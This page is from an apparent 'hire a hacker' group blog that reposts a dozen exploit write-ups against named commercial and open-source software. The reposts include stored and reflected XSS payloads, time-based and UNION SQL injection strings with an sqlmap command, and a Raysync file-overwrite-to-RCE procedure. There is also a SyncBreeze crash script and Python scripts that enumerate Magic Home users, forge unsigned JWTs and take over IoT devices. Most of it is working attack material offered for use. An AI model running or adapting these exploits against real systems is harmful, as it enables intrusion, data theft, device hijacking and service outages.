Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863158325

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
# Date: 13-12-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage: https://getgrav.org/
# Software Link: https://getgrav.org/downloads
# Version: Grav v1.6.30 - Admin v1.9.18
# Tested on: Windows 10/Kali Linux
# Contact: https://www.linkedin.com/in/sagarbanwa/

Step to reproduce :

1) log in to the grav-admin panel 
2) Go to Pages 
3) Click on Add 
4) It will ask to Add Page
5) fill the following details as below 
   Page Title : <script>alert(1337)</script>
   Folder Name : sagar_Banwa
   Parent Page : /(root)
   Page Template : Default
   Value : yes
6) click on the Save button 
7) now Click on Pages again.
8) your page name will be listed as <script>alert(1337)</script>
9) Now click on the eye button to see the XSS or you can simply go to http://127.0.0.1/grav-admin/ the XSS will pop-up 

-------------------------------------
   
POST /grav-admin/admin/pages HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 230
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/grav-admin/admin/pages
Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
Upgrade-Insecure-Requests: 1

data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f

-----------------------------
HireHackking 
# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Date: 2020-12-15
# Exploit Author: Frederic ADAM
# Author contact: contact@fadam.eu
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://github.com/PrestaShop/productcomments
# Version: 4.2.0
# Tested on: Debian 10
# CVE : CVE-2020-26248

http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]

Example:
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
HireHackking 
# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass 
# Google Dork: NA
# Date: 22 October 2020
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2020-27199/
# Vendor Homepage: http://www.zengge.com/appkzd
# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en
# Version: 1.5.1 (REQUIRED)
# Tested on: Android 10

## Enumeration ##

import requests
import json
import os
from colorama import init
from colorama import Fore, Back, Style
import re

'''
1. First Stage Authentication
2. Second Stage Enumerate
3. Third Stage Remote Execute
'''

global found_macaddresses
found_macaddresses = []
global outtahere
outtahere = ""
q = "q"
global token


def turnOn(target, token):

    urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
    array = {
        "dataCommandItems":[
            {"hexData":"71230fa3","macAddress":target}
        ]
    }
    data = json.dumps(array)
    headersOn = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json", 
        "Content-Type": "application/json; charset=utf-8",
        "token":token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    print (Fore.WHITE + "[+] Sending Payload ...")
    response = requests.post(urlOn, data=data, headers=headersOn)
    if response.status_code == 200:
        if "true" in response.text:
            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
        else:
            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token):

    urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
    array = {
        "dataCommandItems":[
            {"hexData":"71240fa4","macAddress":target}
        ]
    }
    data = json.dumps(array)
    headersOff = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json", 
        "Content-Type": "application/json; charset=utf-8",
        "token":token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    print (Fore.WHITE + "[+] Sending Payload ...")
    response = requests.post(urlOff, data=data, headers=headersOff)
    if response.status_code == 200:
        if "true" in response.text:
            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
        else:
            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token):

    outtahere = ""
    q = "q"
    if len(str(target)) < 12:
        print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
    elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
        while outtahere.lower() != q.lower():
            if outtahere == "0":
                turnOn(target, token)
            elif outtahere == "1":
                turnOff(target, token)
            outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)

def Main():
    urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

    data = {
        "userID":"<Valid Registered Email/Username>",
        "password":"<Valid Registered Password>",
        "clientID":""
    }

    headersAuth = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json", 
        "Content-Type": "application/json; charset=utf-8",
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }

    # First Stage Authenticate

    os.system('clear')
    print (Fore.WHITE + "[+] Authenticating ...")
    response = requests.post(urlAuth, json=data, headers=headersAuth)
    resJsonAuth = response.json()
    token = (resJsonAuth['token'])

    # Second Stage Enumerate

    print (Fore.WHITE + "[+] Enumerating ...")
    macbase = "C82E475DCE"
    macaddress = []
    a = ["%02d" % x for x in range(100)]
    for num in a:
        macaddress.append(macbase+num)

    with open('loot.txt', 'w') as f:
        for mac in macaddress:
            urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
            params = {
                "macAddress":mac
            }

            headersEnum = {
                "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
                "Accept-Language": "en-US",
                "Content-Type": "application/json; charset=utf-8",
                "Accept": "application/json",
                "token": token,
                "Host": "wifij01us.magichue.net",
                "Connection": "close",
                "Accept-Encoding": "gzip, deflate"
            }

            response = requests.get(urlEnum, params=params, headers=headersEnum)
            resJsonEnum = response.json()
            data = (resJsonEnum['data'])
            if not data:
                pass
            elif data:
                found_macaddresses.append(mac)
                print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
                f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
            else:
                print (Fore.RED + "[-] No results found!")
                print(Style.RESET_ALL)

        if not found_macaddresses:
            print (Fore.RED + "[-] No MAC addresses retrieved")
        elif found_macaddresses:
            attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
            if (attackboolean.upper() == 'Y'):
                target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
                lighItUp(target, token)
            elif (attackboolean.upper() == 'N'):
                print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
            else:
                print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)

if __name__ == "__main__":
    Main()

## Token Forging ##

#!/usr/local/bin/python3

import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
import time
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime

now = datetime.now()
stamp = mktime(now.timetuple())

'''
HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''

def Usage():
    print (f"Usage: {sys.argv[0]} <username> <unique id>")

def Main(user, uniqid):
    os.system('clear')
    print ("[+] Encoding ...")
    print ("[+] Bypass header created!")
    print ("HTTP/1.1 200")
    print ("Server: nginx/1.10.3")
    print ("Date: "+str(format_date_time(stamp))+"")
    print ("Content-Type: application/json;charset=UTF-8")
    print ("Connection: close\r\n\r\n")

    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
    jwt_headerEncoded = url64.encode(jwt_header.strip())
    jwt_dataEncoded = url64.encode(jwt_data.strip())
    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        Usage()
    else:
        Main(sys.argv[1], sys.argv[2])

## Device Takeover PoC ##

#!/usr/local/bin/python3

import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re

def Usage():
    print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")

def Main():

    attacker_email = sys.argv[1]
    target_email = sys.argv[2]
    target_mac = sys.argv[3]
    forged_token = sys.argv[4]

    os.system('clear')
    print (Fore.WHITE + "[+] Sending Payload ...")
    url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"

    array = {"friendUserID":attacker_email, "macAddress":target_mac}

    data = json.dumps(array)

    headers = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json", 
        "Content-Type": "application/json; charset=utf-8",
        "token":forged_token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    
    response = requests.post(url, data=data, headers=headers)
    if response.status_code == 200:
        if "true" in response.text:
            print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
        else:
            print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)

if __name__ == "__main__":
    if len(sys.argv) < 5:
        Usage()
    else:
        Main()
HireHackking

Raysync 3.3.3.8 - RCE 

# Exploit Title: Raysync 3.3.3.8 - RCE
# Date: 04/10/2020
# Exploit Author: XiaoLong Zhu
# Vendor Homepage: www.raysync.io
# Version: below 3.3.3.8
# Tested on: Linux

step1: run RaysyncServer.sh to build a web application on the local

environment, set admin password to 123456 , which will be write to

manage.db file.

step2: curl "file=@manage.db" http://[raysync
ip]/avatar?account=1&UserId=/../../../../config/manager.db

to override remote manage.db file in server.

step3: login in admin portal with admin/123456.

step4: create a normal file with all permissions in scope.

step5: modify RaySyncServer.sh ,add arbitrary evil command.

step6: trigger rce with clicking "reset" button
HireHackking

Seotoaster 3.2.0 - Stored XSS on Edit page properties

HACKER · %s · %s

# Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties # Exploit Author: Hardik Solanki # Vendor Homepage: https://www.seotoaster.com/ # Software Link: https://crm-marketing-automation-platforms.seotoaster.com/ # Version: 3.2.0 # Tested on Windows 10 XSS ATTACK: Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. The web page or web application becomes a vehicle to deliver the malicious script to the user’s browser. Vulnerable vehicles that are commonly used for Cross-site Scripting attacks are forums, message boards, and web pages that allow comments. XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: Edit page properties Steps to reproduce: 1: Navigate to "https://localhost/" and log in with valid credentials. 2: Then navigates/click on "Edit page properties". 3: Add the payload "*"><script>alert(document.cookie)</script>*", on "Page header H1 tag" field and click on "Save Page" button. Page Saved succesfully. 4: Hence XSS will get stored and trigger on the main home/main page.
HireHackking

Content Management System 1.0 - 'id' SQL Injection

HACKER · %s · %s

# Exploit Title: Content Management System 1.0 - 'id' SQL Injection # Exploit Author: Zhayi (Zeo) # Date: 2020-12-14 # Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: WINDOWS 10 Step 1. Capture the request of the " http://127.0.0.1/ajax.php?action=load_list" page in burpsute Step 2. Save POST the packet Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs " Step 4. This will inject successfully and you will have an information disclosure of all databases contents POST the packet --- POST /ajax.php?action=load_list HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 63 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3 Origin: http://127.0.0.1 Referer: http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0 --- SQLMAP --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689 AND 'ZPQO'='ZPQO&start=0 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT 6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0 Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL-- -&start=0 ---
HireHackking

Content Management System 1.0 - 'First Name' Stored XSS

HACKER · %s · %s

# Exploit Title:Content Management System 1.0 - 'First Name' Stored XSS # Exploit Author: Zhayi (Zeo) # Date: 2020-12-14 # Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Tested on: WINDOWS 10 Step 1: Log in to the CMS with any valid user credentials. Step 2: Click on the logged in username on header and select Manage Account. Step 3: Rename the user First Name to "<script>alert(document.domain)</script>". Step 4: Update Profile and this will trigger the XSS. Step 5: Logout and login again and the page will display the domain name.
HireHackking

Smart Hospital 3.1 - "Add Patient" Stored XSS

HACKER · %s · %s

# Exploit Title: Smart Hospital 3.1 - "Add Patient" Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-18 # Vendor Homepage: https://smart-hospital.in/index.html # Software Link: https://codecanyon.net/item/smart-hospital-hospital-management-system/23205038 # Affected Version: Version 3.1 # Tested on: Kali Linux Step 1. Login to the application with Super Admin credentials Step 2. Click on "OPD-Out Patient" and then click on "Add Patient" then select "Add Patient" Again. Step 3. Insert payload - "><svg/onmouseover=alert(1)> , in Name , Guardian Name , Email , Address , Remarks and Any Known Allergies and Save it. Step 4. Now the patient profile will open , when your course will move around profile details they will show an alert box.
HireHackking

FRITZ!Box 7.20 - DNS Rebinding Protection Bypass

HACKER · %s · %s

# Exploit Title: FRITZ!Box 7.20 - DNS Rebinding Protection Bypass # Date: 2020-06-23 # Exploit Author: RedTeam Pentesting GmbH # Vendor Homepage: https://en.avm.de/ # Version: 7.20 # CVE: 2020-26887 Advisory: FRITZ!Box DNS Rebinding Protection Bypass RedTeam Pentesting discovered a vulnerability in FRITZ!Box router devices which allows to resolve DNS answers that point to IP addresses in the private local network, despite the DNS rebinding protection mechanism. Details ======= Product: FRITZ!Box 7490 and potentially others Affected Versions: 7.20 and below Fixed Versions: >= 7.21 Vulnerability Type: Bypass Security Risk: low Vendor URL: https://en.avm.de/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-003 Advisory Status: published CVE: 2020-26887 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-26887 Introduction ============ "For security reasons, the FRITZ!Box suppresses DNS responses that refer to IP addresses in its own home network. This is a security function of the FRITZ!Box to protect against what are known as DNS rebinding attacks." (from the vendor's homepage) More Details ============ FRITZ!Box router devices employ a protection mechanism against DNS rebinding attacks. If a DNS answer points to an IP address in the private network range of the router, the answer is suppressed. Suppose the FRITZ!Box routers DHCP server is in its default configuration and serves the private IP range of 192.168.178.1/24. If a DNS request is made by a connected device, which resolves to an IPv4 address in the configured private IP range (for example 192.168.178.20) an empty answer is returned. However, if instead the DNS answer contains an AAAA-record with the same private IP address in its IPv6 representation (::ffff:192.168.178.20) it is returned successfully. Furthermore, DNS requests which resolve to the loopback address 127.0.0.1 or the special address 0.0.0.0 can be retrieved, too. Proof of Concept ================ Supposing the following resource records (RR) are configured for different subdomains of example.com: ------------------------------------------------------------------------ private.example.com 1 IN A 192.168.178.20 local.example.com 1 IN A 127.0.0.1 privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20 ------------------------------------------------------------------------ A DNS request to the FRITZ!Box router for the subdomain private.example.com returns an empty answer, as expected: ------------------------------------------------------------------------ $ dig private.example.com @192.168.178.1 ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;private.example.com. IN A ------------------------------------------------------------------------ DNS requests for the subdomains privateipv6.example.com and local.example.com return the configured resource records successfully, effectively bypassing the DNS rebinding protection: ------------------------------------------------------------------------ $ dig privateipv6.example.com @192.168.178.1 AAAA ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;privateipv6.example.com. IN AAAA ;; ANSWER SECTION: privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20 $ dig local.example.com @192.168.178.1 ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;local.example.com. IN A ;; ANSWER SECTION: local.example.com. 1 IN A 127.0.0.1 ------------------------------------------------------------------------ Workaround ========== None. Fix === The problem is corrected in FRITZ!OS 7.21. Security Risk ============= As shown, the DNS rebinding protection of FRITZ!Box routers can be bypassed allowing for DNS rebinding attacks against connected devices. This type of attack however is only possible if vulnerable services are present in the local network, which are reachable over HTTP without authentication. The web interface of FRITZ!Box routers for example is not vulnerable to this type of attack, since the HTTP Host header is checked for known domains. For this reason the risk is estimated to be low. Timeline ======== 2020-06-23 Vulnerability identified 2020-07-08 Vendor notified 2020-07-20 Vendor provided fixed version to RedTeam Pentesting 2020-07-23 Vendor notified of another problematic IP 2020-08-06 Vendor provided fixed version to RedTeam Pentesting 2020-10-06 Vendor starts distribution of fixed version for selected devices 2020-10-19 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
HireHackking

SyncBreeze 10.0.28 - 'login' Denial of Service (Poc)

HACKER · %s · %s

# Exploit Title: SyncBreeze 10.0.28 - 'login' Denial of Service (Poc) # Data: 18-Dec-2020 # Exploit Author: Ahmed Elkhressy # Vendor Homepage: http://www.syncbreeze.com # Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe # Version: 10.0.28 # Tested on: Windows 7, Windows 10 #!/usr/bin/python import socket host="192.168.1.9" payload = 'A' *1000 request = "" request += "POST /login HTTP/1.1\r\n" request += "Host: "+host+"\r\n" request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n" request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" request += "Accept-Language: en-US,en;q=0.5\r\n" request += "Accept-Encoding: gzip, deflate\r\n" request += "Content-Type: application/x-www-form-urlencoded\r\n" request += "Content-Length: 27\r\n" request += "Origin: http://"+host+"\r\n" request += "Connection: keep-alive\r\n" request += "Referer: http://"+host+"/login"+payload+"\r\n" request += "Upgrade-Insecure-Requests: 1\r\n" request += "\r\n" request += "username=test&password=test" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 80)) s.send(request) print s.recv(1024) s.close
HireHackking

Spotweb 1.4.9 - 'search' SQL Injection

HACKER · %s · %s

# Exploit Title: Spotweb 1.4.9 - 'search' SQL Injection # Google Dork: N/A # Date: 20 December 2020 # Exploit Author: BouSalman # Vendor Homepage: https://github.com/spotweb/spotweb # Software Link: N/A # Version: 1.4.9 # Tested on: Ubuntu 18.04 # CVE: CVE-2020-35545 GET /?page=index&search[tree]=cat0_z0_c')+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))c)+AND+(' HTTP/1.1 Host: 192.168.99.151 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close
HireHackking

SCO Openserver 5.0.7 - 'section' Reflected XSS

HACKER · %s · %s

# Exploit Title: SCO Openserver 5.0.7 - 'section' Reflected XSS # Google Dork: inurl:/cgi-bin/manlist?section # Discovered Date: 14/06/2020 # Author: Ramikan # Vendor Homepage: https://www.xinuos.com/products # Software Link: https://www.sco.com/products/openserver507/-overview # Affected Version: Tested on 5.0.7, 6 can be affected on other versions. # Tested on: SCO Openserver 5.0.7 & version 6 # CVE : CVE-2020-25495 ************************************************************************************************************************************* Vulnerability :Refelected XSS & HTML Injection ************************************************************************************************************************************* A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'. Affected URL:http://host:8457/cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> Affected Paramenter: section ************************************************************************************************************************************* POC ************************************************************************************************************************************* Request: ************************************************************************************************************************************* GET /cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> HTTP/1.1 Host: 192.168.20.48:8457 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ************************************************************************************************************************************* Response: ************************************************************************************************************************************* HTTP/1.1 200 OK Date: Thu, 03 Sep 2020 17:08:51 GMT Server: Apache/1.3.36 (Unix) mod_perl/1.29 Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 2680 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> <head> <title>Manual section "><h1>hello</h1></P><script>alert(123)</script></title> <META HTTP-EQUIV='Content-Type' CONTENT='text/html;charset=ISO-8859-1'> <link rel="stylesheet" type="text/css" href="/styles/lin_moz.css" /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> </head> <body bgcolor="#FFFFFF" topmargin="0" marginheight="0"> <!-- Begin DocView navigation toolbar --> <!--htdig_noindex--> <table class=dvtb width="100%" cellpadding=0 cellspacing=0 border=0 style="padding: 0;" > <tr valign=top class=dvtb> <td class=dvdb> <table class=dvtb cellpadding=3 cellspacing=1 border=0 bgcolor=#FFFFFF width=611 > <tr class=dvtb> <td class=dvtb align=center style="background: #2059A6;"> <a href="/en/index.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> DOC HOME </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/en/Navpages/sitemap.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> SITE MAP </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/manform?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> MAN PAGES </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/infocat?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> GNU INFO </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/search?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> SEARCH </a></td> </tr> </table> </td> <td class=dvtb align="left" width=100%> <table class=dvtb cellpadding="3" cellspacing="1" border="0" width="100%" bgcolor="#FFFFFF" > <tr class=dvtb valign="top"> <td class=dvtb style="background: #2059A6;" align=center width=100%> <a name=null class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;" > &nbsp; </a> 